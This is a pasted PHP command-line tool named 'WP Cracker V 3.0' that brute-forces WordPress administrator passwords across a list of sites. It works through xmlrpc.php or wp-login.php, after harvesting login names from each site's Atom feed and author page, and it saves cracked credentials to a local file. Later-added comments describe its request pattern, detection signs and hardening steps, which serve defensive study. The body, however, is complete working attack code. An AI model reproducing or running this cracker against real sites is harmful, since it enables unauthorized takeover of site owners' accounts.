
WP Cracker V 3.0

a guest
Sep 27th, 2014
  1. <?
  // Triage summary: command-line script. It prompts on STDIN for two file paths
  // (a list of sites and a password list), loads both, and passes them to brute().
  2.  
  // Error reporting is switched off, the execution time limit is removed and the
  // memory limit is raised, so a run is silent and unbounded.
  3. error_reporting(0);
  4. set_time_limit(0);
  5. ini_set('memory_limit', '640000M');
  6.  
  7.  
  8. echo"
  9.  
  10. [#]=============================[#]
  11.  
  12. [#] WP Brute Forcer V 3.0 [#]
  13.  
  14. [#] Nani17 - fb.com/root.sy3 [#]
  15.  
  16. [#] MaDe By Islam [#]
  17.  
  18. [#] Last Update : 26/9/2014 [#]
  19.  
  20. [#]=============================[#]
  21.  
  22. ";
  23. //$f1 = fopen("coki.txt","w");
  24. //fclose($f1);
  25.  
  // Sites list: the path is read from STDIN, the file is read whole and split on "\n"
  // (one site per element). Read failures are hidden by the @ operator.
  26. echo"\n(Enter Sites List) => ";
  27. $sites = trim(fgets(STDIN,1024));
  28.  
  29. $k2=trim(@file_get_contents($sites));
  30. $list2=@explode("\n",$k2);
  31. $count2 =count($list2);
  32.  
  // Password list: loaded the same way as the sites list.
  33. echo"(Enter wordlist) => ";
  34. $wl = trim(fgets(STDIN,1024));
  35.  
  36. $k=trim(@file_get_contents($wl));
  37. $list=@explode("\n",$k);
  38. $count =@count($list);
  39.  
  // The run continues only when the password file produced non-empty content ($k);
  // otherwise the script prints a message and exits.
  40. if($k){
  41. echo"\n[*] $count2 site and $count password loaded \n";
  42. echo"\n[*] Cracking ... \n\n";
  43. }else{
  44. echo "[*] no file found \n";
  45. exit();
  46. }
  47.  
  /**
   * Walks every site in $list2 and tries every password in $list against one
   * account name per site, over XML-RPC when that endpoint responds as expected
   * and over the wp-login.php form otherwise.
   *
   * Per-site request sequence, as a target's access log would show it:
   *   1. GET /wp-trackback.php - the site is skipped unless the body matches /need/i.
   *   2. GET /?feed=atom and GET /?author=1 - account-name discovery.
   *   3. Header fetch of /xmlrpc.php plus one wp.getUsersBlogs POST with fixed dummy credentials.
   *   4. One POST per password-list entry to /xmlrpc.php or /wp-login.php.
   * Each of the three GETs is sent twice, because curl_exec() is called twice per handle.
   *
   * Detection notes: the probes and the XML-RPC requests carry a fixed MSIE 6.0
   * User-Agent, and the XML-RPC bodies are posted with
   * Content-Type: application/x-www-form-urlencoded. The wp-login.php POSTs set no
   * User-Agent option and always carry testcookie=1.
   *
   * Hardening notes: throttle or lock out repeated failures on both /wp-login.php and
   * /xmlrpc.php, disable XML-RPC where it is not needed, keep ?author=N and feed author
   * fields from revealing login names, and require strong passwords or a second factor
   * on administrator accounts.
   *
   * @param array $list2 Site base URLs, one per element (each is trimmed before use).
   * @param array $list  Candidate passwords, one per element.
   * @return void Progress is echoed; hits are appended to jh.txt.
   */
  48. function brute($list2,$list){
  49. foreach($list2 as $site){
  50.  
  51. $site = trim($site);
  52.  
  // Fingerprint step: the rest of the loop body runs only when the wp-trackback.php
  // response contains "need" (case-insensitive). Presumably this matches WordPress's
  // trackback error text - confirm against a reference install.
  53. $gets = $site."/wp-trackback.php";
  54. $ch2 = curl_init();
  55. curl_setopt($ch2, CURLOPT_URL, $gets);
  56. curl_setopt($ch2, CURLOPT_HEADER, 0);
  57. curl_setopt($ch2,CURLOPT_RETURNTRANSFER, 1);
  58. curl_setopt($ch2,CURLOPT_FOLLOWLOCATION, 1);
  59. curl_setopt($ch2, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  60. $result2 = curl_exec($ch2);
  61. curl_exec($ch2);
  62. curl_close($ch2);
  63.  
  64. if(preg_match("/need/i",$result2)){
  65.  
  // Account-name source 1: the first <name>...</name> element of the Atom feed.
  66. $user = $site."/?feed=atom";
  67. $ch = curl_init();
  68. curl_setopt($ch, CURLOPT_URL, $user);
  69. curl_setopt($ch, CURLOPT_HEADER, 0);
  70. curl_setopt($ch,CURLOPT_RETURNTRANSFER, 1);
  71. curl_setopt($ch,CURLOPT_FOLLOWLOCATION, 1);
  72. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  73. $result = curl_exec($ch);
  74. curl_exec($ch);
  75. curl_close($ch);
  76. preg_match('#<name>(.*?)</name>#', $result, $username);
  77.  
  // Account-name source 2: the <title> of the ?author=1 page, cut at the first " |".
  78. $user1 = $site."/?author=1";
  79. $ch1 = curl_init();
  80. curl_setopt($ch1, CURLOPT_URL, $user1);
  81. curl_setopt($ch1, CURLOPT_HEADER, 0);
  82. curl_setopt($ch1,CURLOPT_RETURNTRANSFER, 1);
  83. curl_setopt($ch1,CURLOPT_FOLLOWLOCATION, 1);
  84. curl_setopt($ch1, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");
  85. $result1 = curl_exec($ch1);
  86. curl_exec($ch1);
  87. curl_close($ch1);
  88. preg_match('#<title>(.*?)</title>#', $result1, $username1);
  89. $account = explode(' |', $username1[1]);
  90.  
  91.  
  // XML-RPC check: response headers of /xmlrpc.php are fetched, then one
  // wp.getUsersBlogs call with fixed dummy credentials is posted to the same URL.
  92. $check = @get_headers($site."/xmlrpc.php");
  93. $uz = $site."/wp-admin/";
  94.  
  // Byte lengths of the two candidate names; they drive the name choice below.
  95. $method1 = strlen($username[1]);
  96. $method2 = strlen($account[0]);
  97.  
  98. $dataz = "
  99. <methodCall>
  100. <methodName>wp.getUsersBlogs</methodName>
  101. <params>
  102. <param><value><string>adminnnn</string></value></param>
  103. <param><value><string>adminnnn</string></value></param>
  104. </params></methodCall>
  105. ";
  106. $curlz = curl_init();
  107. curl_setopt($curlz,CURLOPT_URL, $site."/xmlrpc.php");
  108. curl_setopt($curlz,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
  109. curl_setopt($curlz,CURLOPT_HTTPHEADER,$headers);
  110. curl_setopt($curlz,CURLOPT_RETURNTRANSFER,1);
  111. curl_setopt($curlz,CURLOPT_FOLLOWLOCATION,1);
  112. curl_setopt($curlz,CURLOPT_TIMEOUT,10);
  113. curl_setopt($curlz,CURLOPT_CONNECTTIMEOUT,10);
  114. curl_setopt($curlz,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
  115. curl_setopt($curlz,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
  116. curl_setopt($curlz,CURLOPT_POSTFIELDS, $dataz);
  117. $resultz = curl_exec($curlz);
  118. curl_close($curlz);
  119.  
  // XML-RPC path: taken when the status line contains "200" and the dummy call did
  // not come back with the "parse error. not well formed" string.
  120. if(eregi("200",$check[0]) && !eregi("<string>parse error. not well formed</string>" , $resultz)){
  // Name choice, first match wins: the feed name when it is 1-15 bytes long; else the
  // author-page name when the feed name is empty and the author name is at most
  // 15 bytes; else the literal "admin".
  121. if(isset($username[1]) && $method1 > 0 && $method1 <= 15){
  122. foreach($list as $pass){
  123. $pass = trim($pass);
  124.  
  125. $headers = array('Content-Type: application/x-www-form-urlencoded');
  126. $isadmin = '<name>isAdmin</name>';
  127. #############################
  128. ## TESTING EACH PASSWORD ##
  129. #############################
  130. $data = "
  131. <methodCall>
  132. <methodName>wp.getUsersBlogs</methodName>
  133. <params>
  134. <param><value><string>$username[1]</string></value></param>
  135. <param><value><string>$pass</string></value></param>
  136. </params></methodCall>
  137. ";
  138. $curl = curl_init();
  139. curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
  140. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
  141. curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
  142. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  143. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  144. curl_setopt($curl,CURLOPT_TIMEOUT,10);
  145. curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
  146. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
  147. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
  148. curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
  149. $result = curl_exec($curl);
  150. curl_close($curl);
  151. ##########################
  152. ## CHECK IF IT WORKED ##
  153. ##########################
  // Success signal on this path: the response body contains "<name>isAdmin</name>".
  // A hit is echoed, appended to jh.txt, and ends the password loop for this site.
  154. if(strstr($result, $isadmin)){
  155. echo"[+] Password is : $pass\n";
  156. $fo = fopen("jh.txt","a+");
  157. fwrite($fo,"[+] $site/wp-admin\n $username[1]:$pass\n\n");
  158. fclose($fo);
  159. break;
  160. }
  161.  
  162. else{
  163. echo "[-] $site : ($username[1]:$pass) -> error\n";
  164. }}}
  165.  
  // Same XML-RPC loop, using the name taken from the ?author=1 page title.
  166. elseif($method1 == 0 && isset($account[0]) && $method2 <= 15){
  167. foreach($list as $pass){
  168. $headers = array('Content-Type: application/x-www-form-urlencoded');
  169. $isadmin = '<name>isAdmin</name>';
  170. #############################
  171. ## TESTING EACH PASSWORD ##
  172. #############################
  173. $data = "
  174. <methodCall>
  175. <methodName>wp.getUsersBlogs</methodName>
  176. <params>
  177. <param><value><string>$account[0]</string></value></param>
  178. <param><value><string>$pass</string></value></param>
  179. </params></methodCall>
  180. ";
  181. $curl = curl_init();
  182. curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
  183. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
  184. curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
  185. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  186. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  187. curl_setopt($curl,CURLOPT_TIMEOUT,10);
  188. curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
  189. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
  190. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
  191. curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
  192. $result = curl_exec($curl);
  193. curl_close($curl);
  194. ##########################
  195. ## CHECK IF IT WORKED ##
  196. ##########################
  197. if(strstr($result, $isadmin)){
  198. echo"[+] Password is : $pass\n";
  199. $fo = fopen("jh.txt","a+");
  200. fwrite($fo,"[+] $site/wp-admin\n $account[0]:$pass\n\n");
  201. fclose($fo);
  202. break;
  203. }
  204.  
  205. else{
  206. echo "[-] $site : ($account[0]:$pass) -> error\n";
  207. }}}
  208.  
  // Same XML-RPC loop, using the literal account name "admin".
  209. else{
  210. $admin = "admin";
  211. foreach($list as $pass){
  212. $pass = trim($pass);
  213. $headers = array('Content-Type: application/x-www-form-urlencoded');
  214. $isadmin = '<name>isAdmin</name>';
  215. #############################
  216. ## TESTING EACH PASSWORD ##
  217. #############################
  218. $data = "
  219. <methodCall>
  220. <methodName>wp.getUsersBlogs</methodName>
  221. <params>
  222. <param><value><string>$admin</string></value></param>
  223. <param><value><string>$pass</string></value></param>
  224. </params></methodCall>
  225. ";
  226. $curl = curl_init();
  227. curl_setopt($curl,CURLOPT_URL, $site."/xmlrpc.php");
  228. curl_setopt($curl,CURLOPT_USERAGENT,'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)');
  229. curl_setopt($curl,CURLOPT_HTTPHEADER,$headers);
  230. curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  231. curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  232. curl_setopt($curl,CURLOPT_TIMEOUT,10);
  233. curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,10);
  234. curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./wp-cookie.txt");
  235. curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./wp-cookie.txt");
  236. curl_setopt($curl,CURLOPT_POSTFIELDS, $data);
  237. $result = curl_exec($curl);
  238. curl_close($curl);
  239. ##########################
  240. ## CHECK IF IT WORKED ##
  241. ##########################
  242. if(strstr($result, $isadmin)){
  243. echo"[+] Password is : $pass\n";
  244. $fo = fopen("jh.txt","a+");
  245. fwrite($fo,"[+] $site/wp-admin\n $admin:$pass\n\n");
  246. fclose($fo);
  247. break;
  248. }
  249.  
  250. else{
  251. echo "[-] $site : ($admin:$pass) -> error\n";
  252. }
  253. }}
  254.  
  255.  
  256. }
  257.  
  258.  
  259.  
  // Form-login path: used when the XML-RPC check above did not pass. The same
  // three-way name choice is repeated, with one POST to /wp-login.php per password.
  // These requests use the cookie file coki.txt and set no User-Agent option.
  260. else{
  261. if(isset($username[1]) && $method1 > 0 && $method1 <= 15){
  262. foreach($list as $pass){
  263. $pass = trim($pass);
  264. $ch = curl_init();
  265. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  266. curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
  267. curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
  268. curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
  269. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  270. curl_setopt($ch,CURLOPT_POST,TRUE);
  271. curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$username[1]."&pwd=".$pass."&wp-submit=Giri‏"."&redirect_to=".$uz."&testcookie=1");
  272. $exec = curl_exec($ch);
  273. curl_close($ch);
  274.  
  // Success signal on this path: the response, after redirects are followed,
  // matches /profile.php/.
  275. if(preg_match("/profile.php/",$exec)){
  276. echo"[+] Password is : $pass\n";
  277. $fo = fopen("jh.txt","a+");
  278. fwrite($fo,"[+] $site/wp-admin\n $username[1]:$pass\n\n");
  279. fclose($fo);
  280. break;
  281. }
  282.  
  283. else{
  284. echo "[-] $site : ($username[1]:$pass) -> error\n";
  285. }
  286. }}
  287.  
  288.  
  // Same form-login loop, using the name taken from the ?author=1 page title.
  289. elseif($method1 == 0 && isset($account[0]) && $method2 <= 15){
  290. foreach($list as $pass){
  291. $pass = trim($pass);
  292. $ch = curl_init();
  293. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  294. curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
  295. curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
  296. curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
  297. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  298. curl_setopt($ch,CURLOPT_POST,TRUE);
  299. curl_setopt($ch,CURLOPT_POSTFIELDS,"log=".$account[0]."&pwd=".$pass."&wp-submit=Giri‏"."&redirect_to=".$uz."&testcookie=1");
  300. $exec = curl_exec($ch);
  301. curl_close($ch);
  302.  
  303. if(preg_match("/profile.php/",$exec)){
  304. echo"[+] Password is : $pass\n";
  305. $fo = fopen("jh.txt","a+");
  306. fwrite($fo,"[+] $site/wp-admin\n $account[0]:$pass\n\n");
  307. fclose($fo);
  308. break;
  309. }
  310.  
  311. else{
  312. echo "[-] $site : ($account[0]:$pass) -> error\n";
  313. }}}
  314.  
  315.  
  // Same form-login loop, using the literal account name "admin".
  316. else{
  317.  
  318. foreach($list as $pass){
  319. $pass = trim($pass);
  320. $ch = curl_init();
  321. curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
  322. curl_setopt($ch,CURLOPT_URL,$site.'/wp-login.php');
  323. curl_setopt($ch,CURLOPT_COOKIEJAR,"coki.txt");
  324. curl_setopt($ch,CURLOPT_COOKIEFILE,"coki.txt");
  325. curl_setopt($ch,CURLOPT_FOLLOWLOCATION,1);
  326. curl_setopt($ch,CURLOPT_POST,TRUE);
  327. curl_setopt($ch,CURLOPT_POSTFIELDS,"log=admin&pwd=".$pass."&wp-submit=Giri‏"."&redirect_to=".$uz."&testcookie=1");
  328. $exec = curl_exec($ch);
  329. curl_close($ch);
  330.  
  331. if(preg_match("/profile.php/",$exec)){
  332. echo"[+] Password is : $pass\n";
  333. $fo = fopen("jh.txt","a+");
  334. fwrite($fo,"[+] $site/wp-admin\n admin:$pass\n\n");
  335. fclose($fo);
  336. break;
  337. }
  338.  
  339. else{
  340. echo "[-] $site : (admin:$pass) -> error\n";
  341. }
  342. }}}
  343.  
  344. }}}
  // Entry point: runs the per-site loop with the sites list ($list2) and the
  // password list ($list) loaded from the two files named on STDIN.
  345. brute($list2,$list);
  346. ?>